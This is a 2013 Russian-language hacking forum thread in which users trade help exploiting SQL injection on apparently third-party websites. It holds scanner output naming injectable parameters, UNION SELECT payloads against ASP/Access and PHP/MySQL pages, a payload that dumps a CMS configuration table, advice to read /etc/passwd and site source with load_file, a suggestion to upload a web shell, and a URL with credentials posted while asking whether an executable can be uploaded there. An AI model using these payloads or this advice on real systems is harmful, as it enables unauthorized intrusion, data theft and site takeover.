14.05.2013, 01:44
|
|
Познающий
Регистрация: 03.12.2012
Сообщений: 46
С нами:
7074326
Репутация:
0
|
|
Добрый день, подскажите, что это за БД такая, с рашрирениями файлов *.bcp, *.idx, *.pre и *.sch
Спасибо
|
|
|
14.05.2013, 04:52
|
|
Новичок
Регистрация: 22.04.2013
Сообщений: 5
С нами:
6872726
Репутация:
0
|
|
Подскажите что делать далее? Вот нашлась уязвимость:
Source: Form Method: POST
Parameter Name Parameter Type Test Name Severity
+ userid POST SQL Injection (blind test) High
+ submit POST SQL Injection (blind test) High
+ m2hp COOKIE SQL Injection (blind test) High
Как поступать дальше?
|
|
|
|
14.05.2013, 06:29
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от x-promt
Подскажите что делать далее? Вот нашлась уязвимость:
Source: Form Method: POST
Parameter Name Parameter Type Test Name Severity
+ userid POST SQL Injection (blind test) High
+ submit POST SQL Injection (blind test) High
+ m2hp COOKIE SQL Injection (blind test) High
Как поступать дальше?
Крутить как блайнды. Тебе же написали в каких параметрах SQL инъекты.
|
|
|
|
14.05.2013, 15:55
|
|
Новичок
Регистрация: 23.02.2013
Сообщений: 14
С нами:
6956246
Репутация:
0
|
|
День добрый!
Есть ли возможность залить исполняймый файл в данном месте
Код:
http://play-me.ru/users/fileupload/edit
Login:fileupload
pass:fileupload |
|
|
|
14.05.2013, 20:18
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Есть уязвимый сайт:
Код:
http://www.site.com/?parametr1=parametr2&id=-99'
Сообщение от None
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'id like '-99'''.
/duyurular.asp, line 5
при
Код:
+union+select+1,2+from+MSysModules2%00#
и так далее выходит вот такая ошибка:
Сообщение от None
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
Кто знает как раскурить такую скулю и в чем вообще проблма с ней? |
|
|
|
16.05.2013, 15:46
|
|
Новичок
Регистрация: 03.08.2009
Сообщений: 23
С нами:
8827377
Репутация:
-5
|
|
Есть скуль такого вида:
site.ru/ask.php?page=ask&cid=2+union+select+1,2,3,4,5,6
Выводимые поля 2,5,6
Делаю запрос такого вида чтобы определить file_priv(пробел вставляет форум, без моего участия)
site.ru/ask.php?page=ask&cid=2+union+select+1,File_Priv,3, 4,5,6+from+mysql.user+where+user='ask_user'
На что получаю ошибку
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/site/public_html/ask.php on line 203
Вопрос: Каким макаром сделать чтобы он мне вывел file_priv конкретного юзера?
|
|
|
|
16.05.2013, 15:52
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от Evil_Genius
Вопрос: Каким макаром сделать чтобы он мне вывел file_priv конкретного юзера?
всё правильно делаешь, ток может там ковычки фильтруются и из-за этого ошибка
|
|
|
|
16.05.2013, 16:03
|
|
Участник форума
Регистрация: 18.01.2012
Сообщений: 162
С нами:
7535126
Репутация:
1
|
|
Сообщение от Evil_Genius
Есть скуль такого вида:
site.ru/ask.php?page=ask&cid=2+union+select+1,2,3,4,5,6
Выводимые поля 2,5,6
Делаю запрос такого вида чтобы определить file_priv(пробел вставляет форум, без моего участия)
site.ru/ask.php?page=ask&cid=2+union+select+1,File_Priv,3, 4,5,6+from+mysql.user+where+user='ask_user'
На что получаю ошибку
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/site/public_html/ask.php on line 203
Вопрос: Каким макаром сделать чтобы он мне вывел file_priv конкретного юзера?
Че дурью то маяться?load_file('/etc/passwd') ; load_file('/home/site/public_html/ask.php')
|
|
|
|
16.05.2013, 16:18
|
|
Новичок
Регистрация: 03.08.2009
Сообщений: 23
С нами:
8827377
Репутация:
-5
|
|
попробовал load_file и так и сяк и в хэксе - не показыват ничего и ошибок нету
Через софт вот таким запросом выводит содержимое таблицы
site.ru/ask.php?page=ask&cid=999999.9+union+all+select+(se lect+concat(0x7e,0x27,unhex(Hex(cast(cms_config.co nfig_name+as+char))),0x27,0x7e)+from+`site_db`.cms _config+limit+0,1)+,0x31303235343830303536,0x31303 235343830303536,0x31303235343830303536,0x313032353 43830303536,0x31303235343830303536--
Както выводит содержимое нормально...Но как вывести этот file_priv то?
|
|
|
|
16.05.2013, 20:19
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
а нафиг тебе нужен этот file_priv , пробуй сразу заливать шелленг и все
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
